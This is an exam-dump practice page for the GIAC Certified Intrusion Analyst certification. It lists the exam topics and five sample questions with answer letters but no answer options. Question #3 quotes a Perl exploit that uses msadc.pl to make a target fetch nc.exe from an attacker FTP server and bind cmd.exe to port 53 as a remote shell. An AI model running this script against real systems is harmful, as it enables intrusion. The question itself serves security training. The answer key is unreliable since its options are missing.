Deal of the Day! Hurry Up, Grab the Special Discount - Save 25% - Ends In 00:00:00 Coupon code: SAVE25
Welcome to Pass4Success

- Free Preparation Discussions

GIAC Certified Intrusion Analyst Exam

Certification Provider: GIAC
Exam Name: GIAC Certified Intrusion Analyst
Duration: 240 Minutes
Number of questions in our database: 364
Exam Version: Sep. 19, 2023
Exam Official Topics:
  • Topic 1: Demonstrate an understanding of how DNS works for both legitimate and malicious purposes/ IDS Fundamentals and Network Architecture
  • Topic 2: Demonstrate knowledge relating to packet crafting and manipulation/ Demonstrate understanding of the TCP/IP communications model and link layer operations
  • Topic 3: Demonstrate competence in analyzing data from multiple sources as part of a forensic investigation/ Demonstrate ability to craft tcpdump filters that match on given criteria
  • Topic 4: Demonstrate the ability to analyze network and application traffic to identify both normal and malicious behaviors/ Demonstrate an understanding of IDS tuning methods and correlation issues
  • Topic 5: Demonstrate knowledge and skill relating to application layer protocol dissection and analysis/ How to identify fragmentation and fragmentation-based attacks in packet captures
  • Topic 6: Demonstrate knowledge of fundamental IDS concepts, such as network architecture options/ Demonstrate understanding of how fragmentation works
  • Topic 7: Demonstrate an understanding of SiLK and other tools to perform network traffic and flow analysis/ Create effective IDS rules to detect varied types of malicious activity
  • Topic 8: Demonstrate understanding of the UDP and ICMP protocols and the ability to discern between typical and anomalous behavior/ Advanced Analysis and Network Forensics

Free GIAC GIAC Certified Intrusion Analyst Exam Actual Questions

The questions for GIAC Certified Intrusion Analyst were last updated On Sep. 19, 2023

Question #1

Steve works as a Network Administrator for Blue Tech Inc. All client computers in the company run the Windows Vista operating system. He often travels long distances on official duty. While traveling, he connects to the office server through his laptop by using remote desktop connection.a

He wants to run an application that is available on the server of the company. When he connects to the server, he gets a message that the connection is blocked by the firewall. He returns to his office to resolve the issue. He opens the Windows Firewall Settings dialog box. What actions should he perform in the dialog box given below to accomplish the task?

Reveal Solution Hide Solution
Correct Answer: A

Question #2

John works as a Network Security Administrator for NetPerfect Inc. The manager of the company has told John that the company's phone bill has increased drastically. John suspects that the company's phone system has been cracked by a malicious hacker. Which attack is used by malicious hackers to crack the phone system?

Reveal Solution Hide Solution
Correct Answer: B

Question #3

Adam, a malicious hacker performs an exploit, which is given below:

#################################################################

$port = 53;

# Spawn cmd.exe on port X

$your = "192.168.1.1";# Your FTP Server 89

$user = "Anonymous";# login as

$pass = 'noone@nowhere.com';# password

#################################################################

$host = $ARGV[0];

print "Starting ...\n";

print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h

$host -C \"echo

open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system

("perl msadc.pl -h

$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");

system("perl

msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get

hacked.

html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is

downloading ...

\n";

system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is

finished ...

(Have a ftp server)\n";

$o=; print "Opening ...\n";

system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";

#system("telnet $host $port"); exit(0);

Which of the following is the expected result of the above exploit?

Reveal Solution Hide Solution
Correct Answer: D

Question #4

Where is the Hypertext Transfer Protocol (HTTP) used?

Reveal Solution Hide Solution
Correct Answer: E

Question #5

Which of the following are well-known ports?

Each correct answer represents a complete solution. Choose two.

Reveal Solution Hide Solution
Correct Answer: A, B


Unlock all GIAC Certified Intrusion Analyst Exam Questions with Advanced Practice Test Features:
  • Select Question Types you want
  • Set your Desired Pass Percentage
  • Allocate Time (Hours : Minutes)
  • Create Multiple Practice tests with Limited Questions
  • Customer Support
Get Full Access Now
Disscuss GIAC GIAC Certified Intrusion Analyst Topics, Questions or Ask Anything Related

Save Cancel